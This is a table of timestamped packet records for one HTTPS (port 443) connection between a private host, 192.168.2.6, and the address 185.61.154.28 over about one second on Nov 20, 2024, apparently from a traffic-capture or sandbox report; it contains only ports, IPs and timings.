Nov 20, 2024 12:38:57.510241985 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.510297060 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.510840893 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.510906935 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.510915041 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.512819052 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.512834072 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.512880087 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.512896061 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.512917042 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.513098001 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.513112068 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.513161898 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.513171911 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.514090061 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.514103889 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.514151096 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.514159918 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.514188051 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.546689987 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.546705961 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.546819925 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.546821117 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.546896935 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.554672003 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.554688931 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.554748058 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.554778099 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.554799080 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.590667009 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.590706110 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.590754986 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.590775013 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.590825081 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.591587067 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.591602087 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.591655970 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.591665030 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.602358103 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.602374077 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.602427959 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.602451086 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.602488995 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.603353977 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.603378057 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.603446007 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.603461027 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.604443073 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.604469061 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.604515076 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.604531050 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.604603052 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.607558012 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.620944023 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.636673927 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.636697054 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.636779070 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.636852980 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.636877060 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.637238026 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.637259007 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.637300014 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.637316942 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.637334108 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.645179033 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.645193100 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.645267010 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.645312071 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.669203997 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.682471037 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.682490110 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.682578087 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.682626009 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.692527056 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.692548990 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.692595005 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.692609072 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.692646027 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.693612099 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.693628073 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.693681002 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.693687916 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.693718910 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.694638968 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.694657087 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.694711924 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.694717884 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.694736004 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.696207047 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.696221113 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.696279049 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.696289062 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.696295023 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.714708090 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.727657080 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.727677107 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.727740049 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.727756977 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.728410006 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.728429079 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.728491068 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.728499889 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.736712933 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.736726999 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.736805916 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.736819983 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.770823002 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.770844936 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.770901918 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.770936012 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.770960093 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.781306982 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.781358957 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.781385899 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.781461000 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.781482935 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.781924963 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.781943083 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.781985998 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.782001019 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.782025099 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.782912016 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.782927036 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.782970905 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.782984972 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.783019066 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.783983946 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.784002066 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.784054041 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.784069061 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.784089088 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.796366930 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.822894096 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.822918892 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.822989941 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.823023081 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.823048115 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.823590040 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.823607922 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.823667049 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.823681116 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.823717117 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.831073999 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.831091881 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.831152916 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.831170082 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.831197977 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.864347935 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.864372015 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.864442110 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.864492893 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.864507914 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.874296904 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.874314070 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.874365091 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.874378920 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.875474930 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.875492096 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.875545025 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.875552893 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876091003 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876104116 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876159906 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.876167059 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876919031 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876935959 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.876975060 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.876981974 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.877012968 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.910810947 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.910831928 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.910903931 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.910918951 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.910927057 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.911626101 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.911645889 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.911699057 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.911708117 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.911734104 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.920494080 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.920510054 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.920569897 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.920588017 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.920595884 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.953726053 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.953752995 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.953947067 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.953984022 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.956950903 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.964689016 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.964714050 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.964875937 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.964909077 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.966284037 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.966305017 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.966476917 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.966492891 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.967293024 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.967339993 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.967356920 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.967371941 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.967406988 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.968157053 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.968174934 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.968211889 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:57.968225002 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:57.968236923 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.000245094 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000269890 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000449896 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.000489950 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000801086 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000819921 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000859976 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.000870943 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.000917912 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.009896040 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.009917021 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.010035038 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.010071993 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.043270111 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.043302059 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.043421030 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.043458939 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.054553032 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.054575920 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.054825068 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.054894924 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.055705070 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.055725098 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.055756092 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.055809021 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.055830956 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.055862904 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.056600094 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.056618929 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.056675911 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.056689978 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.056731939 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.057344913 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.057364941 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.057416916 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.057429075 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.057461023 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.092511892 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.092535019 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.092725992 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.092752934 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.093193054 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.093214035 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.093375921 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.093375921 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.093389988 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.107901096 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.107928991 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.108016968 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.108052969 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.108078003 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.135618925 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.135644913 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.135694981 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.135755062 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.135771036 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.135816097 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.145788908 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.145812035 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.145859957 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.147738934 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147758961 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147814989 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147819042 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.147830963 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147875071 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147917986 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147933960 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.147945881 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.147989988 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.148231030 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.148251057 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.148346901 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.148356915 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.182095051 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.182116985 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
